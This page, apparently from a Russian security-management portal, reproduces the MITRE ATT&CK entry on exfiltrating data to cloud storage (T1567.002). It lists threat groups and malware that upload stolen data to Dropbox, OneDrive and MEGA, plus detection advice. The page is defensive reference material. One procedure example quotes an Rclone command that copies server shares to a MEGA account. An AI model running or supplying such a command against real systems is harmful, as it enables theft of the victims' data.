Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Вход Регистрация
MITRE ATT&CK - Техника Эксфильтрация в облачное хранилище
Сертификаты СЗИ
CVE уязвимости
БДУ ФСТЭК уязвимости
НКЦКИ уязвимости
MITRE ATT&CK
БДУ ФСТЭК
Новая БДУ ФСТЭК
EN
Риски
Каталоги
MITRE ATT&CK
Техника
Эксфильтрация в облачное храни...
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

Exfiltration Over Web Service:  Эксфильтрация в облачное хранилище

ID Название
.001 Эксфильтрация в репозиторий кода
.002 Эксфильтрация в облачное хранилище
.003 Exfiltration to Text Storage Sites
.004 Exfiltration Over Webhook

Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.

ID: T1567.002
Относится к технике:  T1567
Тактика(-и): Exfiltration
Платформы: Linux, macOS, Windows
Источники данных: Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Версия: 1.2
Дата создания: 09 Mar 2020
Последнее изменение: 15 Sep 2023

Примеры процедур
Название Описание
Leviathan

Leviathan has used an uploader known as LUNCHMONEY that can exfiltrate files to Dropbox.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)
Akira

Akira will exfiltrate victim data using applications such as Rclone.(Citation: Secureworks GOLD SAHARA)
LuminousMoth

LuminousMoth has exfiltrated data to Google Drive.(Citation: Bitdefender LuminousMoth July 2021)
Rclone

Rclone can exfiltrate data to cloud storage services such as Dropbox, Google Drive, Amazon S3, and MEGA.(Citation: Rclone)(Citation: DFIR Conti Bazar Nov 2021)
RainyDay

RainyDay can use a file exfiltration tool to upload specific files to Dropbox.(Citation: Bitdefender Naikon April 2021)

CreepyDrive

CreepyDrive can use cloud services including OneDrive for data exfiltration.(Citation: Microsoft POLONIUM June 2022)
HAMMERTOSS

HAMMERTOSS exfiltrates data by uploading it to accounts created by the actors on Web cloud storage providers for the adversaries to retrieve later.(Citation: FireEye APT29)
Kimsuky

Kimsuky has exfiltrated stolen files and data to actor-controlled Blogspot accounts.(Citation: Talos Kimsuky Nov 2021)
Threat Group-3390

Threat Group-3390 has exfiltrated stolen data to Dropbox.(Citation: Trend Micro DRBControl February 2020)
Confucius

Confucius has exfiltrated victim data to cloud storage service accounts.(Citation: TrendMicro Confucius APT Feb 2018)
POLONIUM

POLONIUM has exfiltrated stolen data to POLONIUM-owned OneDrive and Dropbox accounts.(Citation: Microsoft POLONIUM June 2022)

HEXANE

HEXANE has used cloud services, including OneDrive, for data exfiltration.(Citation: Microsoft POLONIUM June 2022)

During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y "\\SERVER\Shares" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.(Citation: DFIR Conti Bazar Nov 2021)
Clambling

Clambling can send files from a victim's machine to Dropbox.(Citation: Trend Micro DRBControl February 2020)(Citation: Talent-Jump Clambling February 2020)
Cinnamon Tempest

Cinnamon Tempest has uploaded captured keystroke logs to the Alibaba Cloud Object Storage Service, Aliyun OSS.(Citation: Sygnia Emperor Dragonfly October 2022)
Lazarus Group

Lazarus Group has exfiltrated stolen data to Dropbox using a customized version of dbxcli.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)
Crutch

Crutch has exfiltrated stolen data to Dropbox.(Citation: ESET Crutch December 2020)
Octopus

Octopus has exfiltrated data to file sharing sites.(Citation: ESET Nomadic Octopus 2018)
Wizard Spider

Wizard Spider has exfiltrated stolen victim data to various cloud storage providers.(Citation: Mandiant FIN12 Oct 2021)

Indrik Spider

Indrik Spider has exfiltrated data using Rclone or MEGASync prior to deploying ransomware.(Citation: Mandiant_UNC2165)
Turla

Turla has used WebDAV to upload stolen USB files to a cloud drive.(Citation: Symantec Waterbug Jun 2019) Turla has also exfiltrated stolen files to OneDrive and 4shared.(Citation: ESET ComRAT May 2020)
HAFNIUM

HAFNIUM has exfiltrated data to file sharing sites, including MEGA.(Citation: Microsoft HAFNIUM March 2020)
Empire

Empire can use Dropbox for data exfiltration.(Citation: Github PowerShell Empire)
Earth Lusca

Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)
Ember Bear

Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`.(Citation: CISA GRU29155 2024)
ToddyCat

ToddyCat has used a DropBox uploader to exfiltrate stolen files.(Citation: Kaspersky ToddyCat Check Logs October 2023)
ZIRCONIUM

ZIRCONIUM has exfiltrated stolen data to Dropbox.(Citation: Zscaler APT31 Covid-19 October 2020)

APT41 DUST exfiltrated collected information to OneDrive.(Citation: Google Cloud APT41 2024)
BoxCaon

BoxCaon has the capability to download folders' contents on the system and upload the results back to its Dropbox drive.(Citation: Checkpoint IndigoZebra July 2021)

During Operation Dream Job, Lazarus Group used a custom build of open-source command-line dbxcli to exfiltrate stolen data to Dropbox.(Citation: ESET Lazarus Jun 2020)(Citation: ClearSky Lazarus Aug 2020)
Pcexter

Pcexter can upload stolen files to OneDrive storage accounts via HTTP `POST`.(Citation: Kaspersky ToddyCat Check Logs October 2023)
Chimera

Chimera has exfiltrated stolen data to OneDrive accounts.(Citation: NCC Group Chimera January 2021)
Scattered Spider

Scattered Spider has exfiltrated victim data to the MEGA file sharing site.(Citation: CISA Scattered Spider Advisory November 2023)(Citation: MSTIC Octo Tempest Operations October 2023)
ROKRAT

ROKRAT can send collected data to cloud storage services such as PCloud.(Citation: Malwarebytes RokRAT VBA January 2021)(Citation: Volexity InkySquid RokRAT August 2021)
BoomBox

BoomBox can upload data to dedicated per-victim folders in Dropbox.(Citation: MSTIC Nobelium Toolset May 2021)
FIN7

FIN7 has exfiltrated stolen data to the MEGA file sharing site.(Citation: CrowdStrike Carbon Spider August 2021)

Контрмеры
Контрмера Описание
Restrict Web-Based Content

Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc.

Обнаружение

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server) to known cloud storage services. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. User behavior monitoring may help to detect abnormal patterns of activity.

Ссылки

  1. ClearSky Research Team. (2020, August 13). Operation 'Dream Job' Widespread North Korean Espionage Campaign. Retrieved December 20, 2021.
  2. Breitenbacher, D and Osis, K. (2020, June 17). OPERATION IN(TER)CEPTION: Targeted Attacks Against European Aerospace and Military Companies. Retrieved December 20, 2021.
  3. FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.
  4. Axel F, Pierre T. (2017, October 16). Leviathan: Espionage actor spearphishes maritime and defense targets. Retrieved February 15, 2018.
  5. Secureworks. (n.d.). GOLD SAHARA. Retrieved February 20, 2024.
  6. Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
  7. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
  8. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  9. Vrabie, V. (2021, April 23). NAIKON – Traces from a Military Cyber-Espionage Operation. Retrieved June 29, 2021.
  10. Microsoft. (2022, June 2). Exposing POLONIUM activity and infrastructure targeting Israeli organizations. Retrieved July 1, 2022.
  11. FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015.
  12. An, J and Malhotra, A. (2021, November 10). North Korean attackers use malicious blogs to deliver malware to high-profile South Korean targets. Retrieved December 29, 2021.
  13. Lunghi, D. et al. (2020, February). Uncovering DRBControl. Retrieved November 12, 2021.
  14. Lunghi, D and Horejsi, J. (2018, February 13). Deciphering Confucius: A Look at the Group's Cyberespionage Operations. Retrieved December 26, 2021.
  15. Chen, T. and Chen, Z. (2020, February 17). CLAMBLING - A New Backdoor Base On Dropbox. Retrieved November 12, 2021.
  16. Biderman, O. et al. (2022, October 3). REVEALING EMPEROR DRAGONFLY: NIGHT SKY AND CHEERSCRYPT - A SINGLE RANSOMWARE GROUP. Retrieved December 6, 2023.
  17. Faou, M. (2020, December 2). Turla Crutch: Keeping the “back door” open. Retrieved December 4, 2020.
  18. Cherepanov, A. (2018, October 4). Nomadic Octopus Cyber espionage in Central Asia. Retrieved October 13, 2021.
  19. Shilko, J., et al. (2021, October 7). FIN12: The Prolific Ransomware Intrusion Threat Actor That Has Aggressively Pursued Healthcare Targets. Retrieved June 15, 2023.
  20. Mandiant Intelligence. (2022, June 2). To HADES and Back: UNC2165 Shifts to LOCKBIT to Evade Sanctions. Retrieved July 29, 2024.
  21. Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020.
  22. Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019.
  23. MSTIC. (2021, March 2). HAFNIUM targeting Exchange Servers with 0-day exploits. Retrieved March 3, 2021.
  24. Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.
  25. Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.
  26. US Cybersecurity & Infrastructure Security Agency et al. (2024, September 5). Russian Military Cyber Actors Target U.S. and Global Critical Infrastructure. Retrieved September 6, 2024.
  27. Dedola, G. et al. (2023, October 12). ToddyCat: Keep calm and check logs. Retrieved January 3, 2024.
  28. Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.
  29. Mike Stokkel et al. (2024, July 18). APT41 Has Arisen From the DUST. Retrieved September 16, 2024.
  30. CheckPoint Research. (2021, July 1). IndigoZebra APT continues to attack Central Asia with evolving tools. Retrieved September 24, 2021.
  31. Jansen, W . (2021, January 12). Abusing cloud services to fly under the radar. Retrieved September 12, 2024.
  32. Microsoft. (2023, October 25). Octo Tempest crosses boundaries to facilitate extortion, encryption, and destruction. Retrieved March 18, 2024.
  33. CISA. (2023, November 16). Cybersecurity Advisory: Scattered Spider (AA23-320A). Retrieved March 18, 2024.
  34. Cash, D., Grunzweig, J., Adair, S., Lancaster, T. (2021, August 25). North Korean BLUELIGHT Special: InkySquid Deploys RokRAT. Retrieved October 1, 2021.
  35. Jazi, Hossein. (2021, January 6). Retrohunting APT37: North Korean APT used VBA self decode technique to inject RokRat. Retrieved March 22, 2022.
  36. MSTIC. (2021, May 28). Breaking down NOBELIUM’s latest early-stage toolset. Retrieved August 4, 2021.
  37. Loui, E. and Reynolds, J. (2021, August 30). CARBON SPIDER Embraces Big Game Hunting, Part 1. Retrieved September 20, 2021.
Навигация

Связанные риски

Ничего не найдено

Каталоги

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.